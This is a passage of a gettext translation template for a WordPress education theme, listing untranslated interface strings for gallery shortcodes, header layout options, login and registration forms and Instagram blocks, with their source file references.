framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:109 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:186 msgid "Title Hover Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:403 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:370 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:413 msgid "Choose a custom title hover color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:409 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:379 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:458 msgid "Read More Button Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:412 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:382 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:461 msgid "Choose a custom read more button color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:421 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:391 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:470 msgid "Read More Button Hover Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:424 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:394 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:473 msgid "Choose a custom read more button hover color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:433 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:403 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:482 msgid "Zoom in Button Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:436 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:406 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:485 msgid "Choose a custom zoom in button color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:445 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:411 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:494 msgid "Zoom in Button Hover Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:448 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:414 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:497 msgid "Choose a custom zoom in button hover color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/config.php:10 msgid "SLZ Gallery Masonry" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/config.php:11 msgid "Gallery Masonry of post feature image from custom post type" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:21 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:20 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:24 msgid "Option 1" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:22 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:21 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:25 msgid "Option 2" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:23 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:22 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:26 msgid "Option 3" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:24 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:23 msgid "Option 4" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:72 msgid "Choose columns to show" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:88 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:87 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:65 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:79 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:24 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:22 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:244 msgid "Option Show" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:91 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:90 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:29 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:247 msgid "It is used for aligning the inner content of blocks" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:246 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:238 msgid "Show Tab Filter?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:255 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:247 msgid "Alignment Filter" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:268 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:285 msgid "Show Title?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:277 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:298 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:16 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:99 msgid "Show Category?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:290 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:337 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:151 msgid "Show Read More Button?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:299 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:273 msgid "Load More Button Text" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:302 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:276 msgid "Enter load more button text. If empty, not show buttony." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:311 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:350 msgid "Show Zoom Button?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:10 msgid "SLZ Isotope" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:11 msgid "Isotope of post feature image from custom post type" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/options/layout-1.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:46 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:13 msgid "Oregon" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:27 msgid "Kentucky" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:28 msgid "Missouri" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:29 msgid "Ohio" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:30 msgid "North Carolina" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:243 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:252 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:264 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:277 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:290 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:303 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:316 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:329 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:342 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:355 msgid "Custom Isotope" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:311 msgid "Show Meta Data?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:315 msgid "Choose if you want to show meta data or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:324 msgid "Show Description?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:328 msgid "Choose if you want to show description or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:422 msgid "Meta Data Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:425 msgid "Choose a custom meta data color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:434 msgid "Meta Data Hover Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:437 msgid "Choose a custom meta data hover color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:446 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:138 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:117 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:352 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:111 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:91 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:52 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:218 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:234 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:221 msgid "Description Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:449 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:140 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:114 msgid "Choose a custom description color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/isotope/views/view.php:60 #: framework-customizations/extensions/lema/shortcodes/featured-course/views/layout-1.php:69 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-carousel/views/layout-1.php:10 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/views/layout-1.php:10 msgid "By" msgstr "" #: framework-customizations/extensions/gallery/views/content.php:18 msgid "Google Calendar" msgstr "" #: framework-customizations/extensions/gallery/views/content.php:19 msgid "Ical Export" msgstr "" #: framework-customizations/extensions/gallery/views/content.php:22 msgid "Start" msgstr "" #: framework-customizations/extensions/gallery/views/content.php:23 msgid "End" msgstr "" #: framework-customizations/extensions/gallery/views/content.php:27 msgid "Speakers" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:90 #: framework-customizations/extensions/headers/headers/header-09/options.php:14 msgid "Block" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:91 #: framework-customizations/extensions/headers/headers/header-09/options.php:15 msgid "Choose block to display" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:93 #: framework-customizations/extensions/headers/headers/header-09/options.php:17 msgid "- None -" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:94 #: framework-customizations/extensions/headers/headers/header-09/options.php:18 msgid "Logo" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:95 #: framework-customizations/extensions/headers/headers/header-09/options.php:19 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:7 msgid "Course Category" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:96 #: framework-customizations/extensions/headers/headers/header-09/options.php:20 msgid "Course Search" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:97 #: framework-customizations/extensions/headers/headers/header-09/options.php:21 msgid "Login - Register" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:98 #: framework-customizations/extensions/headers/headers/header-09/options.php:22 msgid "Cart Icon" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:99 #: framework-customizations/extensions/headers/headers/header-09/options.php:23 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:37 msgid "Menu" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:100 #: framework-customizations/extensions/headers/headers/header-09/options.php:24 msgid "Text Link" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:123 #: framework-customizations/extensions/headers/headers/header-09/options.php:74 #: framework-customizations/theme/options/posts/page.php:187 msgid "Header Style" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:124 #: framework-customizations/extensions/headers/headers/header-09/options.php:75 msgid "Choose header style." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:130 #: framework-customizations/extensions/headers/headers/header-09/options.php:134 msgid "Header Top" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:139 #: framework-customizations/extensions/headers/headers/header-09/options.php:143 msgid "Enable Header Top" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:140 #: framework-customizations/extensions/headers/headers/header-09/options.php:144 msgid "Choose to enable header top." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:155 #: framework-customizations/extensions/headers/headers/header-09/options.php:159 msgid "Header Top Style" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:156 #: framework-customizations/extensions/headers/headers/header-09/options.php:160 msgid "Choose style for header top." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:169 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:240 #: framework-customizations/extensions/headers/headers/header-09/options.php:173 #: framework-customizations/extensions/headers/headers/header-09/options.php:244 msgid "Left Block" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:170 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:241 #: framework-customizations/extensions/headers/headers/header-09/options.php:174 #: framework-customizations/extensions/headers/headers/header-09/options.php:245 msgid "Choose shortcode to display in left block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:173 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:182 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:191 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:244 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:253 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:262 #: framework-customizations/extensions/headers/headers/header-09/options.php:177 #: framework-customizations/extensions/headers/headers/header-09/options.php:186 #: framework-customizations/extensions/headers/headers/header-09/options.php:195 #: framework-customizations/extensions/headers/headers/header-09/options.php:248 #: framework-customizations/extensions/headers/headers/header-09/options.php:257 #: framework-customizations/extensions/headers/headers/header-09/options.php:266 #: framework-customizations/extensions/portfolio/config.php:109 #: framework-customizations/theme/options/speed-optimize.php:72 #: framework-customizations/theme/options/speed-optimize.php:81 #: framework-customizations/theme/options/speed-optimize.php:91 msgid "Add" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:178 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:249 #: framework-customizations/extensions/headers/headers/header-09/options.php:182 #: framework-customizations/extensions/headers/headers/header-09/options.php:253 msgid "Center Block" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:179 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:250 #: framework-customizations/extensions/headers/headers/header-09/options.php:183 #: framework-customizations/extensions/headers/headers/header-09/options.php:254 msgid "Choose shortcode to display in center block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:187 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:258 #: framework-customizations/extensions/headers/headers/header-09/options.php:191 #: framework-customizations/extensions/headers/headers/header-09/options.php:262 msgid "Right Block" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:188 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:259 #: framework-customizations/extensions/headers/headers/header-09/options.php:192 #: framework-customizations/extensions/headers/headers/header-09/options.php:263 msgid "Choose shortcode to display in right block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:201 #: framework-customizations/extensions/headers/headers/header-09/options.php:205 msgid "Header Main" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:210 #: framework-customizations/extensions/headers/headers/header-09/options.php:214 msgid "Enable Header Main" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:211 #: framework-customizations/extensions/headers/headers/header-09/options.php:215 msgid "Choose to enable header main." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:226 #: framework-customizations/extensions/headers/headers/header-09/options.php:230 msgid "Header Main Style" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:227 #: framework-customizations/extensions/headers/headers/header-09/options.php:231 msgid "Choose style for header main." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:280 #: framework-customizations/theme/options/page-options.php:33 msgid "Default Setting" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:284 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:187 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:125 #: framework-customizations/theme/options/page-404-settings.php:3 #: framework-customizations/theme/options/page-404-settings.php:28 #: framework-customizations/theme/options/page-options.php:36 #: framework-customizations/theme/options/post-settings.php:391 #: framework-customizations/theme/options/posts/page.php:142 #: framework-customizations/theme/options/posts/slz-faq.php:94 #: framework-customizations/theme/options/template-settings.php:564 #: framework-customizations/theme/options/typography.php:31 #: framework-customizations/theme/options/typography.php:60 #: framework-customizations/theme/options/typography.php:138 msgid "Default" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/config.php:8 #: framework-customizations/extensions/headers/headers/header-09/config.php:9 msgid "Header 09" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/config.php:23 msgid "Transparent" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:48 msgid "Color" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:49 msgid "Choose color for gradient line in header." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:59 msgid "Gradient Line Position" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:60 msgid "Choose position for gradient line in Header." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:62 msgid "After Top Header" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:63 msgid "Before Main Header" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:64 msgid "After Main Header" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:86 msgid "Enable Preloader" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:87 msgid "Choose to enable preloader on site." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:102 msgid "Preloader Image" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:103 msgid "Upload image for preloader." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:116 msgid "Gradient Line" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options.php:117 msgid "Choose to Enable gradient line in Header." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:32 msgid "Enter title for this button." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:36 #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:108 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:124 #: framework-customizations/theme/options/general-settings.php:422 #: framework-customizations/theme/options/general-settings.php:485 msgid "Link" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:37 msgid "" "Link for this button. If blank, this will display only title without link." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:42 msgid "Target" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:43 msgid "Choose how to open link." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:45 msgid "Opens the link in the same frame as it was clicked." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:46 msgid "Opens the link in a new window or tab." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:47 msgid "Opens the link in the parent frame." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:48 msgid "Opens the link in the full body of the window" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/button.php:54 #: framework-customizations/extensions/headers/headers/header-09/options/cart_icon.php:7 #: framework-customizations/extensions/headers/headers/header-09/options/course_category.php:21 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:45 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:44 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:18 #: framework-customizations/extensions/headers/headers/header-09/options/text_link.php:18 msgid "Add extra class to this block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/course_category.php:6 #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:6 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:21 #: includes/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/course_category.php:7 msgid "Choose type of Course Category" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/course_category.php:11 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:24 msgid "Box" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/course_category.php:15 msgid "Tabs" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:7 msgid "Choose type of login, register button." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:11 msgid "Popup" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:20 msgid "Login Text" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:21 msgid "Enter login text." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:25 msgid "Register Text" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/login_register.php:26 msgid "Enter register text." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:32 msgid "Custom Logo" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:33 msgid "" "Choose to use custom logo. If blank, this block will use default logo in " "theme settings." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:39 msgid "Select the background color for this block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:38 msgid "" "Choose custom menu. If blank, menu assign in Menu Location will use as " "default." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:7 msgid "Choose style for this block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/text_link.php:7 msgid "Enter text for this block." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/text_link.php:11 msgid "URL" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/options/text_link.php:12 msgid "" "Link for this block. If blank, this will display only text without link." msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:13 msgid "Avatar of" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:35 #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:39 msgid "Dashboard" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:37 msgid "Wishlist" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:54 msgid "Log out" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:64 #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:6 #: page-templates/login-page.php:70 msgid "Login" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:65 #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:7 #: page-templates/login-page.php:71 msgid "Register" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:19 #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:49 #: page-templates/login-page.php:83 page-templates/login-page.php:113 msgid "or" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:23 #: page-templates/login-page.php:87 msgid "Email" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:26 #: page-templates/login-page.php:90 msgid "Password" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:29 #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:88 #: page-templates/login-page.php:93 page-templates/login-page.php:152 msgid "LOGIN" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:33 #: page-templates/login-page.php:97 msgid "FORGOT MY PASSWORD" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:35 #: page-templates/login-page.php:99 msgid "Don't have an account?" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:36 #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:82 #: page-templates/login-page.php:100 page-templates/login-page.php:146 msgid "REGISTER" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:87 #: page-templates/login-page.php:151 msgid "I have an account!" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:92 #: page-templates/login-page.php:156 msgid "By signing up to create an account I accept EduChain's " msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:92 #: page-templates/login-page.php:156 msgid "Terms of Use" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/login_register_modal.php:92 #: page-templates/login-page.php:156 msgid "Privacy Policy" msgstr "" #: framework-customizations/extensions/headers/headers/header-09/views/search_box.php:8 msgid "Search your courses..." msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/config.php:10 msgid "SLZ Instagram" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/config.php:11 msgid "Show Instagram Image" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:11 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:18 msgid "Block Title" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:14 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:32 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:58 msgid "Block title. If it blank the block will not have a title" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:18 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:36 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:53 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:62 msgid "Block Title Color" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:21 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:119 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:39 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:56 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:139 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:104 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:65 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:104 msgid "Choose a custom title text color." msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:25 msgid "Template" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:28 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:81 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:60 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:53 msgid "Grid" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:29 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:82 msgid "Slider" 